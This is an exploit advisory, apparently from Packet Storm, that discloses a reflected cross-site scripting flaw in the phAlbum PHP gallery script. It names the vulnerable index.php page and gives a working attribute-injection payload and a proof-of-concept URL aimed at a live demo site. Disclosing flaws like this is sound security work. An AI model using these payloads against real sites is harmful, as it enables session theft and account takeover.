phAlbum PHP Gallery Script suffers from a cross site scripting vulnerability.
723c6ef6661ac7169ced0e8dd7d0c1a433062a8a9b5a6efd4ad00d031c7e04c4# Exploit Title: phAlbum php Gallery Script Reflected XSS Vulnerability
# Date: 2012
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr
Issue: Reflected XSS
Risk level: High
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or
Flash into a vulnerable application to fool a user in order to gather
data from them. An attacker can steal the session cookie and take over
the account, impersonating the user. It is also possible to modify the
content of the page presented to the user.
Vulnerable Page:
index.php (XSS)
Example:
URI was set to #" onmouseover=prompt(928624) //
The input is reflected inside a tag parameter between double quotes.
POC:
http://www.phphq.net/demos/phAlbum/index.php/%F6%22%20onmouseover=document.write%28%22index.html%22%29%20//
Thanks,
Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed